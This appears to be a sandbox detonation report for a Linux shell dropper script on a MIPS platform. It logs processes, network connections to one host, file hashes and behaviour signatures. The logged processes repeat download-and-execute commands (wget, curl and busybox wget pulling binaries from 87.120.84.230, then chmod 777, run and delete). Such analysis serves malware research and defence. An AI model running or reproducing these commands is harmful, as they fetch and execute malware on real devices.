[wget http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/bin/chmod

[chmod 777 NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv

[./NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/bin/rm

[rm NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/usr/bin/wget

[wget http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/bin/chmod

[chmod 777 kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs

[./kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/bin/rm

[rm kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/usr/bin/wget

[wget http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/bin/chmod

[chmod 777 aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW

[./aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/bin/rm

[rm aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/usr/bin/wget

[wget http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/bin/chmod

[chmod 777 Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6

[./Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/bin/rm

[rm Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/usr/bin/wget

[wget http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/bin/chmod

[chmod 777 YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q

[./YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/bin/rm

[rm YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/usr/bin/wget

[wget http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/bin/chmod

[chmod 777 iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC

[./iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/bin/rm

[rm iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/usr/bin/wget

[wget http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/bin/chmod

[chmod 777 8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4

[./8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/bin/rm

[rm 8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/usr/bin/wget

[wget http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/bin/chmod

[chmod 777 Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a

[./Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/bin/rm

[rm Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/usr/bin/wget

[wget http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/bin/chmod

[chmod 777 rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr

[./rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/bin/rm

[rm rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr]

/usr/bin/wget

[wget http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/bin/chmod

[chmod 777 MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ

[./MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/bin/rm

[rm MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ]

/usr/bin/wget

[wget http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/bin/chmod

[chmod 777 871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g

[./871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/bin/rm

[rm 871moWlOH71pz1SBM2l4gsg33F8rgrZn6g]

/usr/bin/wget

[wget http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/bin/chmod

[chmod 777 kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs

[./kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/bin/rm

[rm kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs]

/usr/bin/wget

[wget http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/bin/chmod

[chmod 777 aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW

[./aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/bin/rm

[rm aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW]

/usr/bin/wget

[wget http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/bin/chmod

[chmod 777 Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6

[./Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/bin/rm

[rm Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6]

/usr/bin/wget

[wget http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/bin/chmod

[chmod 777 NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv

[./NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/bin/rm

[rm NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv]

/usr/bin/wget

[wget http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/bin/chmod

[chmod 777 iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC

[./iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/bin/rm

[rm iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC]

/usr/bin/wget

[wget http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/bin/chmod

[chmod 777 8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4

[./8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/bin/rm

[rm 8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4]

/usr/bin/wget

[wget http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/bin/chmod

[chmod 777 Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a

[./Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/bin/rm

[rm Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a]

/usr/bin/wget

[wget http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/bin/chmod

[chmod 777 YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q

[./YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/bin/rm

[rm YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q]

/usr/bin/wget

[wget http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

Network

Country Destination Domain Proto
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 87.120.84.230 tcp
DE 87.120.84.230:80 tcp

Files

/tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

Analysis: behavioral4

Detonation Overview

Submitted

2024-10-18 02:59

Reported

2024-10-18 03:01

Platform

debian9-mipsel-20240729-en

Max time kernel

79s

Max time network

78s

Command Line

[/tmp/e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX /tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX N/A
N/A /tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr /tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr N/A
N/A /tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu /tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu N/A
N/A /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr N/A
N/A /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ N/A
N/A /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g N/A
N/A /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv N/A
N/A /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs N/A
N/A /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW N/A
N/A /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 N/A
N/A /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q N/A
N/A /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC N/A
N/A /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 N/A
N/A /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a N/A
N/A /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr N/A
N/A /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ N/A
N/A /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g N/A
N/A /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs N/A
N/A /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW N/A
N/A /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 N/A
N/A /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv N/A
N/A /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC N/A
N/A /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 N/A
N/A /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a N/A
N/A /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q N/A
N/A /tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX /tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX N/A
N/A /tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr /tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr N/A
N/A /tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu /tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g /usr/bin/curl N/A
File opened for modification /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 /usr/bin/curl N/A
File opened for modification /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a /usr/bin/curl N/A
File opened for modification /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ /usr/bin/curl N/A
File opened for modification /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC /usr/bin/curl N/A
File opened for modification /tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu /usr/bin/curl N/A
File opened for modification /tmp/VDXrPwbTemzZoPiBQ954Z4VLKdSGT17JOu /usr/bin/curl N/A
File opened for modification /tmp/MT09eSGpQlRx65jPcKIaCRl5wG3AGmdYPQ /usr/bin/curl N/A
File opened for modification /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW /usr/bin/curl N/A
File opened for modification /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv /usr/bin/curl N/A
File opened for modification /tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr /usr/bin/curl N/A
File opened for modification /tmp/Cv2qlsT9dc7kOLNT2lrEEwbPcNoqboO5e6 /usr/bin/curl N/A
File opened for modification /tmp/aCuUfufxcY7CqdNYHfpMmBhHQ285XSt1kW /usr/bin/curl N/A
File opened for modification /tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX /usr/bin/curl N/A
File opened for modification /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs /usr/bin/curl N/A
File opened for modification /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 /usr/bin/curl N/A
File opened for modification /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr /usr/bin/curl N/A
File opened for modification /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q /usr/bin/curl N/A
File opened for modification /tmp/kaAiz6Dg0KW4df9vTfRpIcSns97mChqyRs /usr/bin/curl N/A
File opened for modification /tmp/Gc55dCWd21NhDvmw2aNlMs9pjPTikfPY2a /usr/bin/curl N/A
File opened for modification /tmp/YtEDDG3X2f42Z0GTcOSbjVGObWa3dDrY8Q /usr/bin/curl N/A
File opened for modification /tmp/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX /usr/bin/curl N/A
File opened for modification /tmp/NKqfDWOvk90SUE1C2ZBDtzmLuFuQqjuhWv /usr/bin/curl N/A
File opened for modification /tmp/8t6KQPr2RT2VEZ9YXbMIkQIvqBlsF2CIV4 /usr/bin/curl N/A
File opened for modification /tmp/871moWlOH71pz1SBM2l4gsg33F8rgrZn6g /usr/bin/curl N/A
File opened for modification /tmp/rdgOw6TIcPHT97ZiaeM9AAPwHjKPIWUdAr /usr/bin/curl N/A
File opened for modification /tmp/9BpToGIRDUa43SzNXJYw0VxikyoDcXoOkr /usr/bin/curl N/A
File opened for modification /tmp/iBFq7BMQTY3PPYA4NAXoYtdE31rnM0EUzC /usr/bin/curl N/A

Processes

/tmp/e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh

[/tmp/e8169a7e862cb872a79a2317540fd5fd8c49f3712ba6e0532843956255ac276b.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/usr/bin/curl

[curl -O http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/bin/busybox

[/bin/busybox wget http://87.120.84.230/bins/jKmLWexz4n97H58kvIoFngEdDkA7dM7mnX]

/bin/chmod

